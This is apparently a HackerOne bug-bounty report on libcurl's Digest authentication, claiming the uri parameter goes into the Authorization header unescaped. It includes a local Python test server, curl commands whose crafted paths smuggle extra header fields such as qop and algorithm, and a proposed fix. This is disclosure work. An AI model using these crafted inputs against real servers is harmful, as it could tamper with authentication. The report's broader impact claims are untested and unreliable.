curl: Digest Authentication Header Injection_H1:3508799

Description

## Summary
The Digest authentication implementation in `libcurl` fails to properly escape the `uri` parameter in the `Authorization` header. While other parameters like `username`, `realm`, and `nonce` are correctly escaped using `auth_digest_string_quoted()`, the `uri` is inserted raw into the header. This allows an attacker who can control the request URI to inject additional parameters into the HTTP `Authorization` header, potentially bypassing security controls or causing protocol confusion.

## Affected Component
- **File:** `lib/vauth/digest.c`
- **Function:** `auth_create_digest_http_message`
- **Lines:** 867-897

## Vulnerability Details

### Root Cause
In `lib/vauth/digest.c`, the Digest authentication response is constructed using `curl_maprintf`. The function properly escapes most parameters but fails to escape the `uri` parameter:

```c
/* lib/vauth/digest.c:867-882 */
if(digest->qop) {
response = curl_maprintf("username=\"%s\", "
"realm=\"%s\", "
"nonce=\"%s\", "
"uri=\"%s\", " // <- VULNERABLE: uri not escaped
"cnonce=\"%s\", "
"nc=%08x, "
"qop=%s, "
"response=\"%s\"",
userp_quoted, // <- username IS escaped
realm_quoted, // <- realm IS escaped
nonce_quoted, // <- nonce IS escaped
uripath, // <- uri NOT escaped
digest->cnonce,
digest->nc,
digest->qop,
request_digest);
}
```

Compare this to how `username` is handled:

```c
/* lib/vauth/digest.c:835-843 */
userp_quoted = auth_digest_string_quoted(userp);
if(!userp_quoted)
return CURLE_OUT_OF_MEMORY;
```

The `auth_digest_string_quoted()` function (lines 151-180) properly escapes double quotes and backslashes:

```c
static char *auth_digest_string_quoted(const char *source)
{
char *dest;
const char *s = source;
size_t n = 1; /* null-terminator */

/* Calculate size needed */
while(*s) {
++n;
if(*s == '"' || *s == '\\') {
++n; // Need extra byte for escape character
}
++s;
}

dest = curlx_malloc(n);
if(dest) {
char *d = dest;
s = source;
while(*s) {
if(*s == '"' || *s == '\\') {
*d++ = '\\'; // Add escape character
}
*d++ = *s++;
}
*d = '\0';
}

return dest;
}
```

### Attack Mechanism
If an attacker can control the URI path to include a double quote character, they can:
1. Terminate the `uri` field early
2. Inject arbitrary parameters into the Digest header
3. Potentially override security-critical parameters like `qop` or `algorithm`

## Proof of Concept

### Prerequisites
- curl with Digest authentication support
- Python 3.x for the test server

### Step 1: Create the Test Server

Save this as `digest_server.py`:

```python

import socket
import threading
import time

def start_server(port=8081):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('127.0.0.1', port))
s.listen(1)
print(f"[*] Digest test server listening on port {port}")

while True:
try:
conn, addr = s.accept()
data = conn.recv(4096).decode('utf-8', errors='replace')

if "Authorization: Digest" not in data:
# Send 401 challenge
response = (
"HTTP/1.1 401 Unauthorized\r\n"
"WWW-Authenticate: Digest realm=\"test\", "
"nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", "
"qop=\"auth\"\r\n"
"Content-Length: 0\r\n"
"\r\n"
)
conn.sendall(response.encode())
print("[*] Sent 401 challenge")
else:
# Extract and display Authorization header
print("\n=== RECEIVED REQUEST ===")
for line in data.split('\r\n'):
if line.startswith('Authorization:'):
print(f"\n{line}\n")

# Highlight the injection
if 'injected=' in line:
print("[!] INJECTION DETECTED!")
print("[!] The 'injected' parameter should NOT be in the header")

# Send 200 OK
response = "HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nOK"
conn.sendall(response.encode())

conn.close()
except Exception as e:
print(f"[-] Error: {e}")

if __name__ == "__main__":
start_server()
```

### Step 2: Start the Server

```bash
python digest_server.py
```

### Step 3: Execute the Attack

In another terminal, run curl with a malicious path containing a double quote:

```bash
curl -v --path-as-is --digest 'http://user:[email protected]:8081/index.html",injected="true'
```

**Important:** The `--path-as-is` flag is required to prevent curl from normalizing the path.

### Step 4: Observe the Result

The server will display output similar to:

```
[*] Sent 401 challenge

=== RECEIVED REQUEST ===

Authorization: Digest username="user",realm="test",nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",uri="/index.html",injected="true",cnonce="NjE3ZjJkMzQwYzQyMQ==",nc=00000001,response="6629fae49393a05397450978507c4ef1",qop="auth"

[!] INJECTION DETECTED!
[!] The 'injected' parameter should NOT be in the header
```

### Analysis of the Injected Header

The malicious path `/index.html",injected="true` causes the following header structure:

```
uri="/index.html",injected="true"
```

Instead of the expected:

```
uri="/index.html\",injected=\"true"
```

This demonstrates that:
1. The double quote in the path terminates the `uri` field
2. The attacker-controlled string `injected="true"` is inserted as a new parameter
3. The Digest authentication header is now malformed with an injected parameter

### Alternative PoC (Python Script)

```python
import subprocess

# Malicious URL with quote injection
url = 'http://user:[email protected]:8081/index.html",injected="true'

# Execute curl
cmd = ['curl', '-v', '--path-as-is', '--digest', url]
result = subprocess.run(cmd, capture_output=True, text=True)

print("=== STDERR (includes headers) ===")
print(result.stderr)

# Look for the injection
if 'injected="true"' in result.stderr:
print("\n[!] VULNERABILITY CONFIRMED")
print("[!] The injected parameter appears in the Authorization header")
else:
print("\n[*] Injection not detected in output")
```

## Impact

## Impact

### Security Implications

1. **Authentication Parameter Manipulation**
- Attacker can inject `qop="none"` to downgrade authentication
- Inject `algorithm="MD5"` to force weaker algorithms
- Add custom parameters that might confuse proxies or servers

2. **Protocol Confusion**
- Malformed headers may cause different parsing by intermediaries
- Could lead to request smuggling in certain proxy configurations

3. **Cache Poisoning**
- Injected parameters might affect cache keys
- Could lead to serving wrong content to users

4. **Logging and Monitoring Bypass**
- Security tools parsing the header may be confused
- Injected parameters might not be logged correctly

### Attack Scenarios

**Scenario 1: QoP Downgrade**
```bash
curl --digest 'http://user:[email protected]/path",qop="none'
```
Result: `uri="/path",qop="none",cnonce=...` - potentially downgrades authentication

**Scenario 2: Algorithm Manipulation**
```bash
curl --digest 'http://user:[email protected]/path",algorithm="MD5'
```
Result: Forces MD5 algorithm even if server supports stronger options

## Recommendation

### Fix
Update `lib/vauth/digest.c` to escape the `uri` parameter using `auth_digest_string_quoted()`:

```c
/* lib/vauth/digest.c - FIXED VERSION */

// Add this before constructing the response
char *uri_quoted = auth_digest_string_quoted(uripath);
if(!uri_quoted) {
curlx_free(nonce_quoted);
curlx_free(realm_quoted);
curlx_free(userp_quoted);
return CURLE_OUT_OF_MEMORY;
}

if(digest->qop) {
response = curl_maprintf("username=\"%s\", "
"realm=\"%s\", "
"nonce=\"%s\", "
"uri=\"%s\", " // Now using escaped version
"cnonce=\"%s\", "
"nc=%08x, "
"qop=%s, "
"response=\"%s\"",
userp_quoted,
realm_quoted,
nonce_quoted,
uri_quoted, // <- FIXED: using escaped uri
digest->cnonce,
digest->nc,
digest->qop,
request_digest);
}

// Don't forget to free
curlx_free(uri_quoted);
```

### Verification
After applying the fix, the PoC should result in a properly escaped header:

```
uri="/index.html\",injected=\"true"
```

The double quotes will be escaped and the injection will fail.

Visit Original Source

Basic Information

ID H1:3508799

Published Jan 13, 2026 at 13:30

Modified Jan 14, 2026 at 10:02

{
    "lastseen": "2026-01-14T10:28:08",
    "description": "## Summary\nThe Digest authentication implementation in `libcurl` fails to properly escape the `uri` parameter in the `Authorization` header. While other parameters like `username`, `realm`, and `nonce` are correctly escaped using `auth_digest_string_quoted()`, the `uri` is inserted raw into the header. This allows an attacker who can control the request URI to inject additional parameters into the HTTP `Authorization` header, potentially bypassing security controls or causing protocol confusion.\n\n## Affected Component\n- **File:** `lib/vauth/digest.c`\n- **Function:** `auth_create_digest_http_message`\n- **Lines:** 867-897\n\n## Vulnerability Details\n\n### Root Cause\nIn `lib/vauth/digest.c`, the Digest authentication response is constructed using `curl_maprintf`. The function properly escapes most parameters but fails to escape the `uri` parameter:\n\n```c\n/* lib/vauth/digest.c:867-882 */\nif(digest->qop) {\n  response = curl_maprintf(\"username=\\\"%s\\\", \"\n                           \"realm=\\\"%s\\\", \"\n                           \"nonce=\\\"%s\\\", \"\n                           \"uri=\\\"%s\\\", \"      // <- VULNERABLE: uri not escaped\n                           \"cnonce=\\\"%s\\\", \"\n                           \"nc=%08x, \"\n                           \"qop=%s, \"\n                           \"response=\\\"%s\\\"\",\n                           userp_quoted,       // <- username IS escaped\n                           realm_quoted,       // <- realm IS escaped\n                           nonce_quoted,       // <- nonce IS escaped\n                           uripath,            // <- uri NOT escaped\n                           digest->cnonce,\n                           digest->nc,\n                           digest->qop,\n                           request_digest);\n}\n```\n\nCompare this to how `username` is handled:\n\n```c\n/* lib/vauth/digest.c:835-843 */\nuserp_quoted = auth_digest_string_quoted(userp);\nif(!userp_quoted)\n  return CURLE_OUT_OF_MEMORY;\n```\n\nThe `auth_digest_string_quoted()` function (lines 151-180) properly escapes double quotes and backslashes:\n\n```c\nstatic char *auth_digest_string_quoted(const char *source)\n{\n  char *dest;\n  const char *s = source;\n  size_t n = 1; /* null-terminator */\n  \n  /* Calculate size needed */\n  while(*s) {\n    ++n;\n    if(*s == '\"' || *s == '\\\\') {\n      ++n;  // Need extra byte for escape character\n    }\n    ++s;\n  }\n  \n  dest = curlx_malloc(n);\n  if(dest) {\n    char *d = dest;\n    s = source;\n    while(*s) {\n      if(*s == '\"' || *s == '\\\\') {\n        *d++ = '\\\\';  // Add escape character\n      }\n      *d++ = *s++;\n    }\n    *d = '\\0';\n  }\n  \n  return dest;\n}\n```\n\n### Attack Mechanism\nIf an attacker can control the URI path to include a double quote character, they can:\n1. Terminate the `uri` field early\n2. Inject arbitrary parameters into the Digest header\n3. Potentially override security-critical parameters like `qop` or `algorithm`\n\n## Proof of Concept\n\n### Prerequisites\n- curl with Digest authentication support\n- Python 3.x for the test server\n\n### Step 1: Create the Test Server\n\nSave this as `digest_server.py`:\n\n```python\n\nimport socket\nimport threading\nimport time\n\ndef start_server(port=8081):\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    s.bind(('127.0.0.1', port))\n    s.listen(1)\n    print(f\"[*] Digest test server listening on port {port}\")\n    \n    while True:\n        try:\n            conn, addr = s.accept()\n            data = conn.recv(4096).decode('utf-8', errors='replace')\n            \n            if \"Authorization: Digest\" not in data:\n                # Send 401 challenge\n                response = (\n                    \"HTTP/1.1 401 Unauthorized\\r\\n\"\n                    \"WWW-Authenticate: Digest realm=\\\"test\\\", \"\n                    \"nonce=\\\"dcd98b7102dd2f0e8b11d0f600bfb0c093\\\", \"\n                    \"qop=\\\"auth\\\"\\r\\n\"\n                    \"Content-Length: 0\\r\\n\"\n                    \"\\r\\n\"\n                )\n                conn.sendall(response.encode())\n                print(\"[*] Sent 401 challenge\")\n            else:\n                # Extract and display Authorization header\n                print(\"\\n=== RECEIVED REQUEST ===\")\n                for line in data.split('\\r\\n'):\n                    if line.startswith('Authorization:'):\n                        print(f\"\\n{line}\\n\")\n                        \n                        # Highlight the injection\n                        if 'injected=' in line:\n                            print(\"[!] INJECTION DETECTED!\")\n                            print(\"[!] The 'injected' parameter should NOT be in the header\")\n                \n                # Send 200 OK\n                response = \"HTTP/1.1 200 OK\\r\\nContent-Length: 2\\r\\n\\r\\nOK\"\n                conn.sendall(response.encode())\n                \n            conn.close()\n        except Exception as e:\n            print(f\"[-] Error: {e}\")\n\nif __name__ == \"__main__\":\n    start_server()\n```\n\n### Step 2: Start the Server\n\n```bash\npython digest_server.py\n```\n\n### Step 3: Execute the Attack\n\nIn another terminal, run curl with a malicious path containing a double quote:\n\n```bash\ncurl -v --path-as-is --digest 'http://user:[email protected]:8081/index.html\",injected=\"true'\n```\n\n**Important:** The `--path-as-is` flag is required to prevent curl from normalizing the path.\n\n### Step 4: Observe the Result\n\nThe server will display output similar to:\n\n```\n[*] Sent 401 challenge\n\n=== RECEIVED REQUEST ===\n\nAuthorization: Digest username=\"user\",realm=\"test\",nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\",uri=\"/index.html\",injected=\"true\",cnonce=\"NjE3ZjJkMzQwYzQyMQ==\",nc=00000001,response=\"6629fae49393a05397450978507c4ef1\",qop=\"auth\"\n\n[!] INJECTION DETECTED!\n[!] The 'injected' parameter should NOT be in the header\n```\n\n### Analysis of the Injected Header\n\nThe malicious path `/index.html\",injected=\"true` causes the following header structure:\n\n```\nuri=\"/index.html\",injected=\"true\"\n```\n\nInstead of the expected:\n\n```\nuri=\"/index.html\\\",injected=\\\"true\"\n```\n\nThis demonstrates that:\n1. The double quote in the path terminates the `uri` field\n2. The attacker-controlled string `injected=\"true\"` is inserted as a new parameter\n3. The Digest authentication header is now malformed with an injected parameter\n\n### Alternative PoC (Python Script)\n\n```python\nimport subprocess\n\n# Malicious URL with quote injection\nurl = 'http://user:[email protected]:8081/index.html\",injected=\"true'\n\n# Execute curl\ncmd = ['curl', '-v', '--path-as-is', '--digest', url]\nresult = subprocess.run(cmd, capture_output=True, text=True)\n\nprint(\"=== STDERR (includes headers) ===\")\nprint(result.stderr)\n\n# Look for the injection\nif 'injected=\"true\"' in result.stderr:\n    print(\"\\n[!] VULNERABILITY CONFIRMED\")\n    print(\"[!] The injected parameter appears in the Authorization header\")\nelse:\n    print(\"\\n[*] Injection not detected in output\")\n```\n\n## Impact\n\n## Impact\n\n### Security Implications\n\n1. **Authentication Parameter Manipulation**\n   - Attacker can inject `qop=\"none\"` to downgrade authentication\n   - Inject `algorithm=\"MD5\"` to force weaker algorithms\n   - Add custom parameters that might confuse proxies or servers\n\n2. **Protocol Confusion**\n   - Malformed headers may cause different parsing by intermediaries\n   - Could lead to request smuggling in certain proxy configurations\n\n3. **Cache Poisoning**\n   - Injected parameters might affect cache keys\n   - Could lead to serving wrong content to users\n\n4. **Logging and Monitoring Bypass**\n   - Security tools parsing the header may be confused\n   - Injected parameters might not be logged correctly\n\n### Attack Scenarios\n\n**Scenario 1: QoP Downgrade**\n```bash\ncurl --digest 'http://user:[email protected]/path\",qop=\"none'\n```\nResult: `uri=\"/path\",qop=\"none\",cnonce=...` - potentially downgrades authentication\n\n**Scenario 2: Algorithm Manipulation**\n```bash\ncurl --digest 'http://user:[email protected]/path\",algorithm=\"MD5'\n```\nResult: Forces MD5 algorithm even if server supports stronger options\n\n## Recommendation\n\n### Fix\nUpdate `lib/vauth/digest.c` to escape the `uri` parameter using `auth_digest_string_quoted()`:\n\n```c\n/* lib/vauth/digest.c - FIXED VERSION */\n\n// Add this before constructing the response\nchar *uri_quoted = auth_digest_string_quoted(uripath);\nif(!uri_quoted) {\n  curlx_free(nonce_quoted);\n  curlx_free(realm_quoted);\n  curlx_free(userp_quoted);\n  return CURLE_OUT_OF_MEMORY;\n}\n\nif(digest->qop) {\n  response = curl_maprintf(\"username=\\\"%s\\\", \"\n                           \"realm=\\\"%s\\\", \"\n                           \"nonce=\\\"%s\\\", \"\n                           \"uri=\\\"%s\\\", \"      // Now using escaped version\n                           \"cnonce=\\\"%s\\\", \"\n                           \"nc=%08x, \"\n                           \"qop=%s, \"\n                           \"response=\\\"%s\\\"\",\n                           userp_quoted,\n                           realm_quoted,\n                           nonce_quoted,\n                           uri_quoted,         // <- FIXED: using escaped uri\n                           digest->cnonce,\n                           digest->nc,\n                           digest->qop,\n                           request_digest);\n}\n\n// Don't forget to free\ncurlx_free(uri_quoted);\n```\n\n### Verification\nAfter applying the fix, the PoC should result in a properly escaped header:\n\n```\nuri=\"/index.html\\\",injected=\\\"true\"\n```\n\nThe double quotes will be escaped and the injection will fail.",
    "published": "2026-01-13T13:30:37",
    "modified": "2026-01-14T10:02:17",
    "type": "hackerone",
    "title": "curl: Digest Authentication Header Injection",
    "source": "",
    "references": "",
    "id": "H1:3508799",
    "bulletinFamily": "bugbounty",
    "cwe": null,
    "cvelist": [],
    "sourceData": "",
    "sourceHref": "",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://hackerone.com/reports/3508799",
    "category_name": "News",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

💭 Join the Security Discussion ❌ Cancel Reply